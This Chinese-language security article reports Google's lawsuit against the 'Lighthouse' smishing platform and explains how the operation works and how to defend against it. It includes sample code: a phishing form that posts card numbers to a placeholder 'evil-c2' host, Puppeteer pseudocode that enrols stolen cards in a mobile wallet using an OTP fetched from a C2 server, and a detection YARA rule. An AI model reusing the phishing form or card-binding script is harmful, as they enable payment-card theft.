Google重拳出击“短信钓鱼三人组”:一场横跨中美、直击PhaaS产业链的法律与技术围剿

简介: 2025年11月,Google在美国起诉中国境内网络钓鱼平台“Lighthouse”,揭露其通过模块化“钓鱼即服务”(PhaaS)在全球120国作案超百万起。该团伙仿冒USPS等品牌,利用短信诱导用户泄露验证码,进而劫持移动支付。攻击高度自动化,依托中国云服务快速轮换域名,绕过传统防御。此案标志科技巨头开始跨境溯源反制,也警示国内面临同类威胁——仿顺丰、ETC的钓鱼已现踪迹。防御需个人警惕、企业防护与生态协同并重。

2025年11月12日,美国纽约南区联邦法院迎来一份不同寻常的诉状——科技巨头Google正式对一个代号为“Lighthouse”(灯塔)的中国境内网络钓鱼服务发起民事诉讼。这并非一次普通的品牌维权,而是一场针对所谓“Smishing Triad”(短信钓鱼三人组)的系统性打击行动。据KrebsOnSecurity独家披露,该团伙利用高度模块化的“钓鱼即服务”(Phishing-as-a-Service, PhaaS)平台,在全球120多个国家造成超百万受害者,其手法之娴熟、规模之庞大、组织之严密,已远超传统网络犯罪范畴。

这场诉讼不仅标志着大型科技公司开始以法律武器主动“溯源反制”境外网络黑产,更将中国境内的PhaaS生态首次置于国际聚光灯下。而在国内,这一事件也引发安全界对本土短信钓鱼威胁升级的深度反思——当“仿USPS短信”变成“仿顺丰快递通知”,我们是否已做好准备?

一、“灯塔”照向何方?揭秘Smishing Triad的运作流水线

根据Google提交的诉状,“Lighthouse”并非单一黑客团队,而是一个由五大功能小组构成的“企业化”犯罪联合体:

开发组:负责维护Lighthouse平台,提供600余种钓鱼模板,覆盖400多个知名品牌,包括Apple、Google、PayPal、摩根大通、富国银行,甚至美国邮政(USPS)和E-ZPass电子收费系统;

数据经纪组:批量采购或爬取用户手机号、姓名、地理位置等信息,用于精准投放;

短信投递组:通过虚拟运营商、灰色短信通道或SIM卡池(SIM Box)大规模发送伪装成官方通知的短信;

盗刷变现组:在获取支付卡信息及一次性验证码(OTP)后,迅速绑定至攻击者控制的Apple Pay或Google Pay钱包,并在7–10天内完成高价值商品套现;

运营支持组:在Telegram上开设客服频道,提供多语言技术支持、模板更新、甚至“新手教学视频”。

“他们不是散兵游勇,而是一家‘SaaS公司’,只不过卖的是犯罪工具。”公共互联网反网络钓鱼工作组技术专家芦笛指出,“Lighthouse的客户只需支付月费,就能获得从建站、发信到洗钱的一站式服务——这正是PhaaS模式最危险的地方。”

典型的攻击流程如下:

用户收到一条看似来自“USPS”的短信:“您的包裹因地址不详被扣留,请点击链接支付$2.99重新派送”;

点击后跳转至一个高度仿真的USPS登录页(域名如 usps-delivery[.]online),要求输入信用卡信息;

提交后页面提示:“银行正在验证,请输入您刚收到的6位验证码”;

用户输入验证码——殊不知,此时攻击者正用该卡尝试在Apple设备上添加新支付方式,而验证码正是银行发送的授权码;

一旦绑定成功,攻击者即可在实体商店(如苹果专卖店、珠宝店)使用Apple Pay进行无卡交易。

整个过程平均耗时不足3分钟,且因利用了合法移动支付体系,初期极难被风控系统识别。

二、技术内核拆解:Lighthouse如何绕过传统防御?

要理解Lighthouse为何能长期肆虐,需深入其技术架构。安全研究人员发现,该平台具备三大“反侦察”特性:

1. 域名快速轮换 + CDN混淆

据网络安全公司Silent Push 2025年5月报告,Smishing Triad在任意8天窗口期内可激活约25,000个钓鱼域名。这些域名通常注册于隐私保护服务,并通过Cloudflare、Alibaba Cloud等CDN加速,使得IP地址与真实服务器分离。

# 示例:基于WHOIS和DNS历史的钓鱼域名聚类(简化版)

import whois

import dns.resolver

def is_suspicious_domain(domain):

try:

w = whois.whois(domain)

# 检查注册时间是否<7天

if (datetime.now() - w.creation_date).days < 7:

return True

# 检查NS记录是否指向廉价DNS服务商

ns_records = dns.resolver.resolve(domain, 'NS')

for ns in ns_records:

if 'cheapdns' in str(ns).lower():

return True

except Exception as e:

pass

return False

此类自动化检测虽有效,但面对每日数千新域名的生成速度,传统黑名单机制往往滞后。

2. 模板动态加载 + 品牌元素克隆

Lighthouse后台允许用户选择目标品牌(如“Chase Bank”),系统自动生成包含该品牌Logo、配色、字体甚至favicon的完整页面。Google在诉状中特别指出,其商标被非法嵌入至少1/4的模板中。

更隐蔽的是,部分模板采用“延迟加载”技术:初始HTML不含敏感关键词,待用户交互后再通过JavaScript注入支付表单。

<!-- 初始页面仅显示“Processing...” -->

<div id="loader">Processing your request...</div>

<script>

// 3秒后动态插入表单(规避静态扫描)

setTimeout(() => {

document.getElementById('loader').innerHTML = `

<form action="https://evil-c2[.]com/collect" method="POST">

<img src="https://legit-cdn[.]com/chase-logo.png" />

<input type="text" name="card_number" placeholder="Card Number" />

<input type="submit" value="Verify Payment" />

</form>

`;

}, 3000);

</script>

这种“行为触发式钓鱼”极大提升了绕过邮件网关和网页内容过滤器的成功率。

3. 移动钱包绑定自动化

最致命的一环在于OTP劫持后的自动绑定。攻击者利用Apple/Google提供的API(或模拟浏览器自动化工具如Puppeteer),在后台静默完成钱包添加。

// 伪代码:模拟Apple Pay卡绑定流程(需配合真实设备或模拟器)

const puppeteer = require('puppeteer');

(async () => {

const browser = await puppeteer.launch({ headless: true });

const page = await browser.newPage();

// 导航至Apple Wallet添加页面(需已登录iCloud)

await page.goto('https://wallet.apple.com/add-card');

// 自动填充从钓鱼页窃取的卡号、CVV、有效期

await page.type('#card-number', stolenCard.number);

await page.type('#cvv', stolenCard.cvv);

await page.select('#expiry-month', stolenCard.expMonth);

await page.select('#expiry-year', stolenCard.expYear);

// 等待银行发送OTP,再从C2服务器接收并填入

const otp = await fetchOTPFromC2();

await page.type('#otp-input', otp);

await page.click('#submit-button');

await browser.close();

})();

由于整个过程发生在用户授权的设备上(攻击者通过远程控制或二手设备获得),银行风控系统常误判为“正常用户行为”。

三、托管于中国云:法律追责的“灰色地带”

值得注意的是,Silent Push数据显示,Lighthouse所用钓鱼站点大量托管于两家中国云服务商:腾讯云(AS132203)与阿里云(AS45102)。尽管这些平台均有安全合规政策,但因钓鱼站点生命周期极短(平均存活<48小时),且常伪装成普通电商或博客,自动检测难度极大。

“这不是平台纵容,而是攻防不对称。”芦笛解释,“攻击者用自动化脚本批量部署,而平台依赖人工举报或模型识别,天然处于被动。”

Google此次诉讼的一大战略意图,正是试图通过美国法院的缺席判决(default judgment),获得具有法律效力的侵权认定,进而向中国云服务商施压:“若贵司继续为已被司法认定的犯罪基础设施提供服务,可能面临连带责任。”

这一策略在过往案例中已有先例。2023年,微软曾依据法院禁令,成功促使某东南亚IDC下架Emotet僵尸网络C2服务器。但在中国法律框架下,境外判决的执行力仍存争议。

四、从USPS到顺丰:国内威胁的镜像演进

尽管Lighthouse主要针对欧美用户,但其技术模式已在国内复现。2025年以来,国内多地出现仿冒“顺丰速运”“京东物流”“ETC中心”的短信钓鱼事件。例如:

“【顺丰】您的包裹含违禁品,请点击 sf-express-verify[.]cn 缴纳保证金”;

“【ETC】您的高速账户异常,需立即认证 etcservice-update[.]top”。

这些站点同样采用动态表单、品牌克隆,并诱导用户输入银行卡号及短信验证码。更令人担忧的是,部分团伙已开始尝试绑定支付宝“先享后付”或微信支付分,实现信用套现。

“国内用户对短信的信任度更高,且移动支付普及率全球领先,这反而成了攻击者的‘理想温床’。”芦笛警告,“我们监测到,有PhaaS平台已推出中文模板,专门针对淘宝、拼多多、美团等本土App。”

五、防御之道:从个体警惕到生态协同

面对如此精密的攻击,仅靠用户“提高警惕”远远不够。真正的防线需构建于三个层面:

1. 个人用户:切断“信任链”

绝不点击短信中的链接处理缴费、物流、账户问题。应手动打开官方App或浏览器输入官网地址;

启用双重验证(2FA)时避免使用短信,优先选择Authenticator应用或硬件密钥;

若已输入验证码,立即联系银行冻结卡片,并检查Apple Pay/Google Pay设备列表。

2. 企业侧:品牌防护前置化

注册核心品牌关键词的防御性域名(如 brand-security.com);

部署Brand Protection服务,实时监控暗网、Telegram、域名注册库中的仿冒线索;

在官网显著位置发布“我们绝不会通过短信索要验证码”的声明。

3. 安全社区:共享IOC,推动自动化阻断

公共互联网反网络钓鱼工作组建议,各机构应积极上报钓鱼URL、域名、IP、SSL证书指纹等IOC(Indicators of Compromise),并通过STIX/TAXII协议实现情报共享。

例如,以下YARA规则可用于检测Lighthouse典型页面特征:

rule Lighthouse_Phish_Template {

meta:

description = "Detects Lighthouse phishing page with OTP prompt"

strings:

$s1 = "Your bank has sent a verification code" nocase

$s2 = "Enter the 6-digit code below to complete" nocase

$s3 = /<input[^>]*name=["']otp["']/ nocase

$logo_google = "https://www.google.com/images/branding/googlelogo"

condition:

2 of ($s1, $s2, $s3) and $logo_google

}

此类规则可集成至邮件网关、EDR或Web代理中,实现毫秒级拦截。

六、结语:没有终点的攻防马拉松

Google的诉讼或许能暂时打散Lighthouse的Telegram频道,迫使其更名重启,但正如SecAlliance研究员Ford Merrill所言:“只要利润足够高,他们永远不会真正消失。”

真正的胜利不在于摧毁一个“灯塔”,而在于让每一座“灯塔”都难以点亮。这需要法律、技术、教育与国际合作的四重奏——在美国法院敲响法槌的同时,中国的云服务商、电信运营商、安全厂商与普通网民,也必须成为这场全球反钓鱼战役中不可或缺的一环。

毕竟,下一条仿冒短信,可能就发到你的手机上。而你,是否已准备好说“不”?

编辑:芦笛(公共互联网反网络钓鱼工作组)

目录
相关文章
|
3天前
|
人工智能 JavaScript Linux
【Claude Code 全攻略】终端AI编程助手从入门到进阶(2026最新版)
Claude Code是Anthropic推出的终端原生AI编程助手,支持40+语言、200k超长上下文,无需切换IDE即可实现代码生成、调试、项目导航与自动化任务。本文详解其安装配置、四大核心功能及进阶技巧,助你全面提升开发效率,搭配GitHub Copilot使用更佳。
|
5天前
|
存储 人工智能 自然语言处理
OpenSpec技术规范+实例应用
OpenSpec 是面向 AI 智能体的轻量级规范驱动开发框架,通过“提案-审查-实施-归档”工作流,解决 AI 编程中的需求偏移与不可预测性问题。它以机器可读的规范为“单一真相源”,将模糊提示转化为可落地的工程实践,助力开发者高效构建稳定、可审计的生产级系统,实现从“凭感觉聊天”到“按规范开发”的跃迁。
793 12
|
1天前
|
云安全 安全
免费+限量+领云小宝周边!「阿里云2026云上安全健康体检」火热进行中!
诚邀您进行年度自检,发现潜在风险,守护云上业务连续稳健运行
1159 1
|
5天前
|
消息中间件 人工智能 Kubernetes
阿里云云原生应用平台岗位急招,加入我们,打造 AI 最强基础设施
云原生应用平台作为中国最大云计算公司的基石,现全面转向 AI,打造 AI 时代最强基础设施。寻找热爱技术、具备工程极致追求的架构师、极客与算法专家,共同重构计算、定义未来。杭州、北京、深圳、上海热招中,让我们一起在云端,重构 AI 的未来。
|
4天前
|
人工智能 JavaScript 前端开发
【2026最新最全】一篇文章带你学会Cursor编程工具
本文介绍了Cursor的下载安装、账号注册、汉化设置、核心模式(Agent、Plan、Debug、Ask)及高阶功能,如@引用、@Doc文档库、@Browser自动化和Rules规则配置,助力开发者高效使用AI编程工具。
590 4
|
9天前
|
存储 JavaScript 前端开发
JavaScript基础
本节讲解JavaScript基础核心知识:涵盖值类型与引用类型区别、typeof检测类型及局限性、===与==差异及应用场景、内置函数与对象、原型链五规则、属性查找机制、instanceof原理,以及this指向和箭头函数中this的绑定时机。重点突出类型判断、原型继承与this机制,助力深入理解JS面向对象机制。(238字)
|
7天前
|
IDE 开发工具 C语言
【2026最新】VS2026下载安装使用保姆级教程(附安装包+图文步骤)
Visual Studio 2026是微软推出的最新Windows专属IDE,启动更快、内存占用更低,支持C++、Python等开发。推荐免费的Community版,安装简便,适合初学者与个人开发者使用。
884 11
|
4天前
|
存储 人工智能 测试技术
【Claude Skills】从原理到实战的完全指南
Claude Skills通过模块化设计,将AI变为领域专家,实现工作流标准化。它支持指令封装、自动触发与脚本集成,提升复用性与协作效率,适用于个人提效与团队协同,是AI定制化的新范式。
|
7天前
|
人工智能 Shell 开发工具
Claude Code 2.1.2超详细更新说明,小白也能10分钟上手
Claude Code 2.1.x重磅更新:Shift+Enter换行、Esc+Esc撤销、Ctrl+B后台运行,Skills技能系统全面升级,支持多语言、通配符权限与动态MCP检测,性能提升50%,迭代速度惊人,开发者效率暴涨!
Claude Code 2.1.2超详细更新说明,小白也能10分钟上手